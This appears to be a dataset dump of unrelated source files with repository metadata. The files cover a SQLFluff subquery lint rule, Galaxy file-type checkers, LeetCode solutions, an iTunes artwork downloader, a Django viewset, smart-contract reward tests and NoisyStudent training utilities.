not, we're fine. seg = from_expression_element.children( is_type( "with_compound_statement", "set_expression", "select_statement", ) ) if seg: return LintResult( anchor=seg[0], description=f"{parent_type} clauses should not contain subqueries. Use CTEs instead", ) return None
en
0.826337
Implementation of Rule L042. Join/From clauses should not contain subqueries. Use CTEs instead. By default this rule is configured to allow subqueries within ``FROM`` clauses but not within ``JOIN`` clauses. If you prefer a stricter lint then this is configurable. NB: Some dialects don't allow CTEs, and for those dialects this rule makes no sense and should be disabled. | **Anti-pattern** .. code-block:: sql select a.x, a.y, b.z from a join ( select x, z from b ) using(x) | **Best practice** .. code-block:: sql with c as ( select x, z from b ) select a.x, a.y, c.z from a join c using(x) Join/From clauses should not contain subqueries. Use CTEs instead. NB: No fix for this routine because it would be very complex to implement reliably. # type: ignore # Get the referenced table segment # Is it bracketed? If so, lint that instead. # If we find a child with a "problem" type, raise an issue. # If not, we're fine.
1.871187
2
lib/galaxy/util/checkers.py
BalthazarPavot/galaxy_project_reports
1
6628972
import re import bz2 import gzip import zipfile import binascii import imghdr from galaxy import util from six import StringIO HTML_CHECK_LINES = 100 try: import Image as PIL except ImportError: try: from PIL import Image as PIL except: PIL = None def check_image( file_path ): if PIL is not None: try: im = PIL.open( file_path ) except: return False if im: return im return False else: if imghdr.what( file_path ) is not None: return True return False def check_html( file_path, chunk=None ): if chunk is None: temp = open( file_path, "U" ) else: temp = chunk regexp1 = re.compile( "<A\s+[^>]*HREF[^>]+>", re.I ) regexp2 = re.compile( "<IFRAME[^>]*>", re.I ) regexp3 = re.compile( "<FRAMESET[^>]*>", re.I ) regexp4 = re.compile( "<META[\W][^>]*>", re.I ) regexp5 = re.compile( "<SCRIPT[^>]*>", re.I ) lineno = 0 # TODO: Potentially reading huge lines into string here, this should be # reworked. for line in temp: lineno += 1 matches = regexp1.search( line ) or regexp2.search( line ) or regexp3.search( line ) or regexp4.search( line ) or regexp5.search( line ) if matches: if chunk is None: temp.close() return True if HTML_CHECK_LINES and (lineno > HTML_CHECK_LINES): break if chunk is None: temp.close() return False def check_binary( name, file_path=True ): # Handles files if file_path is True or text if file_path is False is_binary = False if file_path: temp = open( name, "U" ) else: temp = StringIO( name ) try: for char in temp.read( 100 ): if util.is_binary( char ): is_binary = True break finally: temp.close( ) return is_binary def check_gzip( file_path ): # This method returns a tuple of booleans representing ( is_gzipped, is_valid ) # Make sure we have a gzipped file try: temp = open( file_path, "U" ) magic_check = temp.read( 2 ) temp.close() if magic_check != util.gzip_magic: return ( False, False ) except: return ( False, False ) # We support some binary data types, so check if the compressed binary file is valid # If the file is Bam, it should already have been detected as such, so we'll just check # for sff format. try: header = gzip.open( file_path ).read(4) if binascii.b2a_hex( header ) == binascii.hexlify( '.sff' ): return ( True, True ) except: return( False, False ) CHUNK_SIZE = 2 ** 15 # 32Kb gzipped_file = gzip.GzipFile( file_path, mode='rb' ) chunk = gzipped_file.read( CHUNK_SIZE ) gzipped_file.close() # See if we have a compressed HTML file if check_html( file_path, chunk=chunk ): return ( True, False ) return ( True, True ) def check_bz2( file_path ): try: temp = open( file_path, "U" ) magic_check = temp.read( 3 ) temp.close() if magic_check != util.bz2_magic: return ( False, False ) except: return( False, False ) CHUNK_SIZE = 2 ** 15 # reKb bzipped_file = bz2.BZ2File( file_path, mode='rb' ) chunk = bzipped_file.read( CHUNK_SIZE ) bzipped_file.close() # See if we have a compressed HTML file if check_html( file_path, chunk=chunk ): return ( True, False ) return ( True, True ) def check_zip( file_path ): if zipfile.is_zipfile( file_path ): return True return False def is_bz2( file_path ): is_bz2, is_valid = check_bz2( file_path ) return is_bz2 def is_gzip( file_path ): is_gzipped, is_valid = check_gzip( file_path ) return is_gzipped
import re import bz2 import gzip import zipfile import binascii import imghdr from galaxy import util from six import StringIO HTML_CHECK_LINES = 100 try: import Image as PIL except ImportError: try: from PIL import Image as PIL except: PIL = None def check_image( file_path ): if PIL is not None: try: im = PIL.open( file_path ) except: return False if im: return im return False else: if imghdr.what( file_path ) is not None: return True return False def check_html( file_path, chunk=None ): if chunk is None: temp = open( file_path, "U" ) else: temp = chunk regexp1 = re.compile( "<A\s+[^>]*HREF[^>]+>", re.I ) regexp2 = re.compile( "<IFRAME[^>]*>", re.I ) regexp3 = re.compile( "<FRAMESET[^>]*>", re.I ) regexp4 = re.compile( "<META[\W][^>]*>", re.I ) regexp5 = re.compile( "<SCRIPT[^>]*>", re.I ) lineno = 0 # TODO: Potentially reading huge lines into string here, this should be # reworked. for line in temp: lineno += 1 matches = regexp1.search( line ) or regexp2.search( line ) or regexp3.search( line ) or regexp4.search( line ) or regexp5.search( line ) if matches: if chunk is None: temp.close() return True if HTML_CHECK_LINES and (lineno > HTML_CHECK_LINES): break if chunk is None: temp.close() return False def check_binary( name, file_path=True ): # Handles files if file_path is True or text if file_path is False is_binary = False if file_path: temp = open( name, "U" ) else: temp = StringIO( name ) try: for char in temp.read( 100 ): if util.is_binary( char ): is_binary = True break finally: temp.close( ) return is_binary def check_gzip( file_path ): # This method returns a tuple of booleans representing ( is_gzipped, is_valid ) # Make sure we have a gzipped file try: temp = open( file_path, "U" ) magic_check = temp.read( 2 ) temp.close() if magic_check != util.gzip_magic: return ( False, False ) except: return ( False, False ) # We support some binary data types, so check if the compressed binary file is valid # If the file is Bam, it should already have been detected as such, so we'll just check # for sff format. try: header = gzip.open( file_path ).read(4) if binascii.b2a_hex( header ) == binascii.hexlify( '.sff' ): return ( True, True ) except: return( False, False ) CHUNK_SIZE = 2 ** 15 # 32Kb gzipped_file = gzip.GzipFile( file_path, mode='rb' ) chunk = gzipped_file.read( CHUNK_SIZE ) gzipped_file.close() # See if we have a compressed HTML file if check_html( file_path, chunk=chunk ): return ( True, False ) return ( True, True ) def check_bz2( file_path ): try: temp = open( file_path, "U" ) magic_check = temp.read( 3 ) temp.close() if magic_check != util.bz2_magic: return ( False, False ) except: return( False, False ) CHUNK_SIZE = 2 ** 15 # reKb bzipped_file = bz2.BZ2File( file_path, mode='rb' ) chunk = bzipped_file.read( CHUNK_SIZE ) bzipped_file.close() # See if we have a compressed HTML file if check_html( file_path, chunk=chunk ): return ( True, False ) return ( True, True ) def check_zip( file_path ): if zipfile.is_zipfile( file_path ): return True return False def is_bz2( file_path ): is_bz2, is_valid = check_bz2( file_path ) return is_bz2 def is_gzip( file_path ): is_gzipped, is_valid = check_gzip( file_path ) return is_gzipped
en
0.866888
# TODO: Potentially reading huge lines into string here, this should be # reworked. # Handles files if file_path is True or text if file_path is False # This method returns a tuple of booleans representing ( is_gzipped, is_valid ) # Make sure we have a gzipped file # We support some binary data types, so check if the compressed binary file is valid # If the file is Bam, it should already have been detected as such, so we'll just check # for sff format. # 32Kb # See if we have a compressed HTML file # reKb # See if we have a compressed HTML file
2.6736
3
python/105.construct-binary-tree-from-preorder-and-inorder-traversal.py
fengbaoheng/leetcode
1
6628973
# # @lc app=leetcode.cn id=105 lang=python3 # # [105] 从前序与中序遍历序列构造二叉树 # from typing import List class TreeNode: def __init__(self, x): self.val = x self.left = None self.right = None class Solution: # 根据前序遍历找到根 # 根据根在中序遍历中划分左右子树 # 递归生成子树 def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode: try: len_pre = len(preorder) len_in = len(inorder) if len_pre != len_in or len_pre == 0: return None # 找到根节点 root_val = preorder[0] root = TreeNode(root_val) # 划分左右子树的遍历结果 index = inorder.index(root_val) if index == -1: return None pre_left = preorder[1:1+index] pre_right = preorder[1+index:] in_left = inorder[:index] in_right = inorder[1+index:] # 生成左右子树 root.left = self.buildTree(pre_left, in_left) root.right = self.buildTree(pre_right, in_right) return root except: return None
# # @lc app=leetcode.cn id=105 lang=python3 # # [105] 从前序与中序遍历序列构造二叉树 # from typing import List class TreeNode: def __init__(self, x): self.val = x self.left = None self.right = None class Solution: # 根据前序遍历找到根 # 根据根在中序遍历中划分左右子树 # 递归生成子树 def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode: try: len_pre = len(preorder) len_in = len(inorder) if len_pre != len_in or len_pre == 0: return None # 找到根节点 root_val = preorder[0] root = TreeNode(root_val) # 划分左右子树的遍历结果 index = inorder.index(root_val) if index == -1: return None pre_left = preorder[1:1+index] pre_right = preorder[1+index:] in_left = inorder[:index] in_right = inorder[1+index:] # 生成左右子树 root.left = self.buildTree(pre_left, in_left) root.right = self.buildTree(pre_right, in_right) return root except: return None
zh
0.773571
# # @lc app=leetcode.cn id=105 lang=python3 # # [105] 从前序与中序遍历序列构造二叉树 # # 根据前序遍历找到根 # 根据根在中序遍历中划分左右子树 # 递归生成子树 # 找到根节点 # 划分左右子树的遍历结果 # 生成左右子树
3.652464
4
downloadArtwork.py
panchr/itunes-artwork-downloader
1
6628974
# <NAME> # downloadArtwork.py # STDIN/STDOUT wrapper around iTunes.py import urllib2 import urllib import json import sys import os API_URL = "http://itunes.apple.com/search" def main(): '''Main process: read data from stdin and write to stdout''' temp_dir = sys.stdin.readline().strip("\n") if not os.path.exists(temp_dir): os.mkdir(temp_dir) # AppleScript reads from here output = open(os.path.join(temp_dir, ".download_stdout"), "w") for line in sys.stdin: split_data = line.strip("\n").split("\t\t\t") artwork_url = getArtworkUrl(*split_data) if artwork_url: # filter out unicode characters from the filepath disk_path = unicode(os.path.join(temp_dir, ",".join(split_data)), errors = 'ignore').encode("ascii", errors = "ignore") urllib.urlretrieve(artwork_url, disk_path) else: disk_path = "-" output.write(disk_path + "\n") output.close() def getArtworkUrl(song, artist = "", album = ""): '''Get the artwork URL for a given song, with optional artist and album names''' # form a search query by concatenating the various metadata if album: resp = attemptSearchQuery(album, "album") # try to get a more generic result by omitting the album name if not resp: return getArtworkUrl(song, artist) else: resp = attemptSearchQuery(song, "song") if not resp: return getArtworkUrl(song + "," + artist, artist) results = filter(lambda item: artist in item["artistName"], resp) best = results[0] if len(results) >= 1 else resp[0] return best['artworkUrl60'].replace("60x60", "600x600") def attemptSearchQuery(query, entity): '''Attempt a search query''' params = {"term": query, "entity": entity, "country": "US", "media": "music", "limit": 50} resp = urllib2.urlopen(API_URL, urllib.urlencode(params)) if resp.getcode() == 200: data = json.loads(resp.read()) if data["resultCount"] >= 1: return data['results'] return "" # no result or failed call if __name__ == '__main__': main()
# <NAME> # downloadArtwork.py # STDIN/STDOUT wrapper around iTunes.py import urllib2 import urllib import json import sys import os API_URL = "http://itunes.apple.com/search" def main(): '''Main process: read data from stdin and write to stdout''' temp_dir = sys.stdin.readline().strip("\n") if not os.path.exists(temp_dir): os.mkdir(temp_dir) # AppleScript reads from here output = open(os.path.join(temp_dir, ".download_stdout"), "w") for line in sys.stdin: split_data = line.strip("\n").split("\t\t\t") artwork_url = getArtworkUrl(*split_data) if artwork_url: # filter out unicode characters from the filepath disk_path = unicode(os.path.join(temp_dir, ",".join(split_data)), errors = 'ignore').encode("ascii", errors = "ignore") urllib.urlretrieve(artwork_url, disk_path) else: disk_path = "-" output.write(disk_path + "\n") output.close() def getArtworkUrl(song, artist = "", album = ""): '''Get the artwork URL for a given song, with optional artist and album names''' # form a search query by concatenating the various metadata if album: resp = attemptSearchQuery(album, "album") # try to get a more generic result by omitting the album name if not resp: return getArtworkUrl(song, artist) else: resp = attemptSearchQuery(song, "song") if not resp: return getArtworkUrl(song + "," + artist, artist) results = filter(lambda item: artist in item["artistName"], resp) best = results[0] if len(results) >= 1 else resp[0] return best['artworkUrl60'].replace("60x60", "600x600") def attemptSearchQuery(query, entity): '''Attempt a search query''' params = {"term": query, "entity": entity, "country": "US", "media": "music", "limit": 50} resp = urllib2.urlopen(API_URL, urllib.urlencode(params)) if resp.getcode() == 200: data = json.loads(resp.read()) if data["resultCount"] >= 1: return data['results'] return "" # no result or failed call if __name__ == '__main__': main()
en
0.841902
# <NAME> # downloadArtwork.py # STDIN/STDOUT wrapper around iTunes.py Main process: read data from stdin and write to stdout # AppleScript reads from here # filter out unicode characters from the filepath Get the artwork URL for a given song, with optional artist and album names # form a search query by concatenating the various metadata # try to get a more generic result by omitting the album name Attempt a search query # no result or failed call
3.2373
3
app/group/views/group_form.py
TIHLDE/Lepton
7
6628975
from django.shortcuts import get_object_or_404 from rest_framework import mixins from rest_framework.viewsets import GenericViewSet from app.common.permissions import BasicViewPermission, is_admin_user from app.forms.mixins import APIFormErrorsMixin from app.forms.models.forms import GroupForm from app.forms.serializers.forms import GroupFormSerializer from app.group.models.group import Group class GroupFormViewSet(APIFormErrorsMixin, mixins.ListModelMixin, GenericViewSet): serializer_class = GroupFormSerializer permission_classes = [BasicViewPermission] queryset = GroupForm.objects.all() def get_queryset(self): group = get_object_or_404(Group, slug=self.kwargs.get("slug")) if self.request.user.is_leader_of(group) or is_admin_user(self.request): return self.queryset.filter(group=group) if self.request.user.is_member_of(group): return self.queryset.filter(group=group, is_open_for_submissions=True) return self.queryset.filter( group=group, is_open_for_submissions=True, only_for_group_members=False )
from django.shortcuts import get_object_or_404 from rest_framework import mixins from rest_framework.viewsets import GenericViewSet from app.common.permissions import BasicViewPermission, is_admin_user from app.forms.mixins import APIFormErrorsMixin from app.forms.models.forms import GroupForm from app.forms.serializers.forms import GroupFormSerializer from app.group.models.group import Group class GroupFormViewSet(APIFormErrorsMixin, mixins.ListModelMixin, GenericViewSet): serializer_class = GroupFormSerializer permission_classes = [BasicViewPermission] queryset = GroupForm.objects.all() def get_queryset(self): group = get_object_or_404(Group, slug=self.kwargs.get("slug")) if self.request.user.is_leader_of(group) or is_admin_user(self.request): return self.queryset.filter(group=group) if self.request.user.is_member_of(group): return self.queryset.filter(group=group, is_open_for_submissions=True) return self.queryset.filter( group=group, is_open_for_submissions=True, only_for_group_members=False )
none
1
1.935567
2
projects/balancer/tests/test_end_of_funding_date.py
Lido-Finance/rewards-managers
2
6628976
<reponame>Lido-Finance/rewards-managers import pytest from brownie import reverts, chain from math import floor rewards_limit = 25 * 1000 * 10**18 rewards_period = 3600 * 24 * 7 @pytest.mark.parametrize( 'period', [ rewards_period, floor(0.5*rewards_period), 4*rewards_period , 4*rewards_period + 1, 4*rewards_period - 1, 5*rewards_period ] ) def test_out_of_funding_date(rewards_manager, period, ldo_token, dao_treasury, program_start_date): amount = 100000 * 10**18 ldo_token.transfer(rewards_manager, amount, {"from": dao_treasury}) assert ldo_token.balanceOf(rewards_manager) == amount out_of_funding_date = program_start_date + rewards_period * 4 chain.sleep(period) chain.mine() assert rewards_manager.out_of_funding_date() == out_of_funding_date assert rewards_manager.period_finish() == out_of_funding_date def test_out_of_funding_date_with_limit_change( rewards_manager, ldo_token, dao_treasury, ldo_agent, program_start_date ): amount = 100000 * 10**18 ldo_token.transfer(rewards_manager, amount, {"from": dao_treasury}) assert ldo_token.balanceOf(rewards_manager) == amount out_of_funding_date = program_start_date + rewards_period * 4 chain.sleep(rewards_period) chain.mine() assert rewards_manager.out_of_funding_date() == out_of_funding_date assert rewards_manager.period_finish() == out_of_funding_date assert rewards_manager.available_allocations() == rewards_limit out_of_funding_date = program_start_date + 2 * rewards_period rewards_manager.set_rewards_limit_per_period(2 * rewards_limit, {"from": ldo_agent}) assert rewards_manager.rewards_limit_per_period() == 2 * rewards_limit assert rewards_manager.out_of_funding_date() == out_of_funding_date assert rewards_manager.period_finish() == out_of_funding_date
import pytest from brownie import reverts, chain from math import floor rewards_limit = 25 * 1000 * 10**18 rewards_period = 3600 * 24 * 7 @pytest.mark.parametrize( 'period', [ rewards_period, floor(0.5*rewards_period), 4*rewards_period , 4*rewards_period + 1, 4*rewards_period - 1, 5*rewards_period ] ) def test_out_of_funding_date(rewards_manager, period, ldo_token, dao_treasury, program_start_date): amount = 100000 * 10**18 ldo_token.transfer(rewards_manager, amount, {"from": dao_treasury}) assert ldo_token.balanceOf(rewards_manager) == amount out_of_funding_date = program_start_date + rewards_period * 4 chain.sleep(period) chain.mine() assert rewards_manager.out_of_funding_date() == out_of_funding_date assert rewards_manager.period_finish() == out_of_funding_date def test_out_of_funding_date_with_limit_change( rewards_manager, ldo_token, dao_treasury, ldo_agent, program_start_date ): amount = 100000 * 10**18 ldo_token.transfer(rewards_manager, amount, {"from": dao_treasury}) assert ldo_token.balanceOf(rewards_manager) == amount out_of_funding_date = program_start_date + rewards_period * 4 chain.sleep(rewards_period) chain.mine() assert rewards_manager.out_of_funding_date() == out_of_funding_date assert rewards_manager.period_finish() == out_of_funding_date assert rewards_manager.available_allocations() == rewards_limit out_of_funding_date = program_start_date + 2 * rewards_period rewards_manager.set_rewards_limit_per_period(2 * rewards_limit, {"from": ldo_agent}) assert rewards_manager.rewards_limit_per_period() == 2 * rewards_limit assert rewards_manager.out_of_funding_date() == out_of_funding_date assert rewards_manager.period_finish() == out_of_funding_date
none
1
1.894646
2
problems/1021-remove-outermost-parentheses.py
tzxyz/leetcode
0
6628977
<filename>problems/1021-remove-outermost-parentheses.py class Solution: """ 有效括号字符串为空 ("")、"(" + A + ")" 或 A + B,其中 A 和 B 都是有效的括号字符串,+ 代表字符串的连接。 例如,"","()","(())()" 和 "(()(()))" 都是有效的括号字符串。 如果有效字符串 S 非空,且不存在将其拆分为 S = A+B 的方法,我们称其为原语(primitive),其中 A 和 B 都是非空有效括号字符串。 给出一个非空有效字符串 S,考虑将其进行原语化分解,使得:S = P_1 + P_2 + ... + P_k,其中 P_i 是有效括号字符串原语。 对 S 进行原语化分解,删除分解中每个原语字符串的最外层括号,返回 S 。 示例 1: 输入:"(()())(())" 输出:"()()()" 解释: 输入字符串为 "(()())(())",原语化分解得到 "(()())" + "(())", 删除每个部分中的最外层括号后得到 "()()" + "()" = "()()()"。 示例 2: 输入:"(()())(())(()(()))" 输出:"()()()()(())" 解释: 输入字符串为 "(()())(())(()(()))",原语化分解得到 "(()())" + "(())" + "(()(()))", 删除每隔部分中的最外层括号后得到 "()()" + "()" + "()(())" = "()()()()(())"。 示例 3: 输入:"()()" 输出:"" 解释: 输入字符串为 "()()",原语化分解得到 "()" + "()", 删除每个部分中的最外层括号后得到 "" + "" = ""。 """ def removeOuterParentheses(self, s: str) -> str: """ 将字符串每个字符入栈,遇到括号就移除。 每次栈空,则将索引在 s[start+1:end] 加入结果集(移除最外层括号) :param s: :return: """ stack, result, start, end = [], [], 0, 0 for idx, c in enumerate(s): if stack: if stack[-1] == '(' and c == ')': stack.pop(-1) else: stack.append(c) if not stack: end = idx result.append(s[start+1:end]) start = idx + 1 else: stack.append(c) return ''.join(result) if __name__ == '__main__': tests = [ ('(()())(())', '()()()'), ('(()())(())(()(()))', '()()()()(())') ] for i, o in tests: assert Solution().removeOuterParentheses(i) == o
<filename>problems/1021-remove-outermost-parentheses.py class Solution: """ 有效括号字符串为空 ("")、"(" + A + ")" 或 A + B,其中 A 和 B 都是有效的括号字符串,+ 代表字符串的连接。 例如,"","()","(())()" 和 "(()(()))" 都是有效的括号字符串。 如果有效字符串 S 非空,且不存在将其拆分为 S = A+B 的方法,我们称其为原语(primitive),其中 A 和 B 都是非空有效括号字符串。 给出一个非空有效字符串 S,考虑将其进行原语化分解,使得:S = P_1 + P_2 + ... + P_k,其中 P_i 是有效括号字符串原语。 对 S 进行原语化分解,删除分解中每个原语字符串的最外层括号,返回 S 。 示例 1: 输入:"(()())(())" 输出:"()()()" 解释: 输入字符串为 "(()())(())",原语化分解得到 "(()())" + "(())", 删除每个部分中的最外层括号后得到 "()()" + "()" = "()()()"。 示例 2: 输入:"(()())(())(()(()))" 输出:"()()()()(())" 解释: 输入字符串为 "(()())(())(()(()))",原语化分解得到 "(()())" + "(())" + "(()(()))", 删除每隔部分中的最外层括号后得到 "()()" + "()" + "()(())" = "()()()()(())"。 示例 3: 输入:"()()" 输出:"" 解释: 输入字符串为 "()()",原语化分解得到 "()" + "()", 删除每个部分中的最外层括号后得到 "" + "" = ""。 """ def removeOuterParentheses(self, s: str) -> str: """ 将字符串每个字符入栈,遇到括号就移除。 每次栈空,则将索引在 s[start+1:end] 加入结果集(移除最外层括号) :param s: :return: """ stack, result, start, end = [], [], 0, 0 for idx, c in enumerate(s): if stack: if stack[-1] == '(' and c == ')': stack.pop(-1) else: stack.append(c) if not stack: end = idx result.append(s[start+1:end]) start = idx + 1 else: stack.append(c) return ''.join(result) if __name__ == '__main__': tests = [ ('(()())(())', '()()()'), ('(()())(())(()(()))', '()()()()(())') ] for i, o in tests: assert Solution().removeOuterParentheses(i) == o
zh
0.896935
有效括号字符串为空 ("")、"(" + A + ")" 或 A + B,其中 A 和 B 都是有效的括号字符串,+ 代表字符串的连接。 例如,"","()","(())()" 和 "(()(()))" 都是有效的括号字符串。 如果有效字符串 S 非空,且不存在将其拆分为 S = A+B 的方法,我们称其为原语(primitive),其中 A 和 B 都是非空有效括号字符串。 给出一个非空有效字符串 S,考虑将其进行原语化分解,使得:S = P_1 + P_2 + ... + P_k,其中 P_i 是有效括号字符串原语。 对 S 进行原语化分解,删除分解中每个原语字符串的最外层括号,返回 S 。 示例 1: 输入:"(()())(())" 输出:"()()()" 解释: 输入字符串为 "(()())(())",原语化分解得到 "(()())" + "(())", 删除每个部分中的最外层括号后得到 "()()" + "()" = "()()()"。 示例 2: 输入:"(()())(())(()(()))" 输出:"()()()()(())" 解释: 输入字符串为 "(()())(())(()(()))",原语化分解得到 "(()())" + "(())" + "(()(()))", 删除每隔部分中的最外层括号后得到 "()()" + "()" + "()(())" = "()()()()(())"。 示例 3: 输入:"()()" 输出:"" 解释: 输入字符串为 "()()",原语化分解得到 "()" + "()", 删除每个部分中的最外层括号后得到 "" + "" = ""。 将字符串每个字符入栈,遇到括号就移除。 每次栈空,则将索引在 s[start+1:end] 加入结果集(移除最外层括号) :param s: :return:
3.413991
3
utils.py
shun1024/noisystudent
0
6628978
<gh_stars>0 # coding=utf-8 # Copyright 2019 The Google NoisyStudent Team Authors. # # Licensed under the Apache License, Version 2.0 (the 'License'); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. '''Model utilities.''' from __future__ import absolute_import from __future__ import division from __future__ import print_function import six import json import re from absl import flags from PIL import Image import collections import os import functools import numpy as np import tensorflow as tf import tensorflow.compat.v2 as tf2 from tensorflow.python.tpu import tpu_function FLAGS = flags.FLAGS def build_learning_rate( initial_lr, global_step, steps_per_epoch=None, lr_decay_type='exponential', decay_factor=0.97, decay_epochs=2.4, total_steps=None, warmup_epochs=5, start_from_step=0, ): '''Build learning rate.''' lr_step = global_step + start_from_step if lr_decay_type == 'exponential': assert steps_per_epoch is not None decay_steps = steps_per_epoch * decay_epochs lr = tf.train.exponential_decay( initial_lr, lr_step, decay_steps, decay_factor, staircase=True) elif lr_decay_type == 'cosine': assert total_steps is not None lr = 0.5 * initial_lr * ( 1 + tf.cos(np.pi * tf.cast(lr_step, tf.float32) / total_steps)) elif lr_decay_type == 'constant': lr = initial_lr else: assert False, 'Unknown lr_decay_type : %s' % lr_decay_type if warmup_epochs: tf.logging.info('Learning rate warmup_epochs: %d' % warmup_epochs) warmup_steps = int(warmup_epochs * steps_per_epoch) warmup_lr = ( initial_lr * tf.cast(lr_step, tf.float32) / tf.cast( warmup_steps, tf.float32)) lr = tf.cond(lr_step < warmup_steps, lambda: warmup_lr, lambda: lr) return lr def build_optimizer(learning_rate, optimizer_name='rmsprop', decay=0.9, epsilon=0.001, momentum=0.9): '''Build optimizer.''' if optimizer_name == 'sgd': tf.logging.info('Using SGD optimizer') optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate) elif optimizer_name == 'momentum': tf.logging.info('Using Momentum optimizer') optimizer = tf.train.MomentumOptimizer( learning_rate=learning_rate, momentum=momentum) elif optimizer_name == 'rmsprop': tf.logging.info('Using RMSProp optimizer') optimizer = tf.train.RMSPropOptimizer(learning_rate, decay, momentum, epsilon) else: tf.logging.fatal('Unknown optimizer:', optimizer_name) return optimizer class TpuBatchNormalization(tf.layers.BatchNormalization): # class TpuBatchNormalization(tf.layers.BatchNormalization): '''Cross replica batch normalization.''' def __init__(self, fused=False, **kwargs): if fused in (True, None): raise ValueError('TpuBatchNormalization does not support fused=True.') super(TpuBatchNormalization, self).__init__(fused=fused, **kwargs) def _cross_replica_average(self, t, num_shards_per_group): '''Calculates the average value of input tensor across TPU replicas.''' num_shards = tpu_function.get_tpu_context().number_of_shards group_assignment = None if num_shards_per_group > 1: if num_shards % num_shards_per_group != 0: raise ValueError('num_shards: %d mod shards_per_group: %d, should be 0' % (num_shards, num_shards_per_group)) num_groups = num_shards // num_shards_per_group group_assignment = [[ x for x in range(num_shards) if x // num_shards_per_group == y ] for y in range(num_groups)] return tf.tpu.cross_replica_sum(t, group_assignment) / tf.cast( num_shards_per_group, t.dtype) else: tf.logging.info('TpuBatchNormalization None') return tf.tpu.cross_replica_sum(t, group_assignment) / tf.cast( num_shards, t.dtype) def _moments(self, inputs, reduction_axes, keep_dims): '''Compute the mean and variance: it overrides the original _moments.''' shard_mean, shard_variance = super(TpuBatchNormalization, self)._moments( inputs, reduction_axes, keep_dims=keep_dims) num_shards = tpu_function.get_tpu_context().number_of_shards or 1 if FLAGS.num_shards_per_group != -1: num_shards_per_group = FLAGS.num_shards_per_group else: if num_shards <= 8: # Skip cross_replica for 2x2 or smaller slices. num_shards_per_group = 1 else: num_shards_per_group = max(8, num_shards // 8) tf.logging.info('TpuBatchNormalization with num_shards_per_group %s', num_shards_per_group) if num_shards_per_group > 1 or num_shards_per_group == -2: # Compute variance using: Var[X]= E[X^2] - E[X]^2. shard_square_of_mean = tf.math.square(shard_mean) shard_mean_of_square = shard_variance + shard_square_of_mean group_mean = self._cross_replica_average( shard_mean, num_shards_per_group) group_mean_of_square = self._cross_replica_average( shard_mean_of_square, num_shards_per_group) group_variance = group_mean_of_square - tf.math.square(group_mean) return (group_mean, group_variance) else: return (shard_mean, shard_variance) def stochastic_depth(inputs, is_training, stochastic_depth_rate): '''Apply stochastic depth.''' if not is_training: return inputs # Compute keep_prob # TODO(tanmingxing): add support for training progress. keep_prob = 1.0 - stochastic_depth_rate # Compute stochastic_depth tensor batch_size = tf.shape(inputs)[0] random_tensor = keep_prob random_tensor += tf.random_uniform([batch_size, 1, 1, 1], dtype=inputs.dtype) binary_tensor = tf.floor(random_tensor) output = tf.div(inputs, keep_prob) * binary_tensor return output def archive_ckpt(ckpt_eval, ckpt_objective, ckpt_path): '''Archive a checkpoint if the metric is better.''' ckpt_dir, ckpt_name = os.path.split(ckpt_path) saved_objective_path = os.path.join(ckpt_dir, 'best_objective.txt') saved_objective = float('-inf') if tf.gfile.Exists(saved_objective_path): with tf.gfile.GFile(saved_objective_path, 'r') as f: saved_objective = float(f.read()) if saved_objective > ckpt_objective: tf.logging.info('Ckpt %s is worse than %s', ckpt_objective, saved_objective) return False filenames = tf.gfile.Glob(ckpt_path + '.*') if filenames is None: tf.logging.info('No files to copy for checkpoint %s', ckpt_path) return False # Clear the old folder. dst_dir = os.path.join(ckpt_dir, 'archive') if tf.gfile.Exists(dst_dir): tf.gfile.DeleteRecursively(dst_dir) tf.gfile.MakeDirs(dst_dir) # Write checkpoints. for f in filenames: dest = os.path.join(dst_dir, os.path.basename(f)) tf.gfile.Copy(f, dest, overwrite=True) ckpt_state = tf.train.generate_checkpoint_state_proto( dst_dir, model_checkpoint_path=ckpt_name, all_model_checkpoint_paths=[ckpt_name]) with tf.gfile.GFile(os.path.join(dst_dir, 'checkpoint'), 'w') as f: f.write(str(ckpt_state)) with tf.gfile.GFile(os.path.join(dst_dir, 'best_eval.txt'), 'w') as f: f.write('%s' % ckpt_eval) # Update the best objective. with tf.gfile.GFile(saved_objective_path, 'w') as f: f.write('%f' % ckpt_objective) tf.logging.info('Copying checkpoint %s to %s', ckpt_path, dst_dir) return True # TODO(hongkuny): Consolidate this as a common library cross models. class DepthwiseConv2D(tf.keras.layers.DepthwiseConv2D, tf.layers.Layer): '''Wrap keras DepthwiseConv2D to tf.layers.''' pass def save_pic(uint8_arr, filename, log=True): if log: tf.logging.info('saving {}'.format(filename)) img = Image.fromarray(uint8_arr) with tf.gfile.Open(filename, 'wb') as ouf: img.save(ouf, subsampling=0, quality=100) def int64_feature(value): '''Wrapper for inserting int64 features into Example proto.''' if not isinstance(value, list): value = [value] return tf.train.Feature(int64_list=tf.train.Int64List(value=value)) def float_feature(value): '''Wrapper for inserting float features into Example proto.''' if not isinstance(value, list): value = [value] return tf.train.Feature(float_list=tf.train.FloatList(value=value)) def bytes_feature(value): '''Wrapper for inserting bytes features into Example proto.''' if six.PY3 and isinstance(value, six.text_type): value = six.binary_type(value, encoding='utf-8') return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value])) class ImageCoder(object): '''Helper class that provides TensorFlow image coding utilities.''' def __init__(self): # Create a single Session to run all image coding calls. self._sess = tf.Session() # Initializes function that decodes RGB JPEG data. self._decode_jpeg_data = tf.placeholder(dtype=tf.string) self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3) self._encode_jpeg_data = tf.placeholder(dtype=tf.uint8) self._encode_jpeg = tf.image.encode_jpeg(self._encode_jpeg_data, format='rgb', quality=100) def encode_jpeg(self, image): image_data = self._sess.run(self._encode_jpeg, feed_dict={self._encode_jpeg_data: image}) return image_data def iterate_through_dataset(dst): iter = dst.make_initializable_iterator() elem = iter.get_next() cnt = 0 with tf.Session() as sess: sess.run(iter.initializer) try: while True: features = sess.run(elem) yield features except tf.errors.OutOfRangeError: pass def get_assignment_map_from_checkpoint(vars_list, init_checkpoint, only_teacher_model=False): graph_to_ckpt_map = {} assignment_map = {} for var in vars_list: ori_name = var.name ckpt_name = ori_name[:-len(':0')] if 'global_step' in ori_name: continue 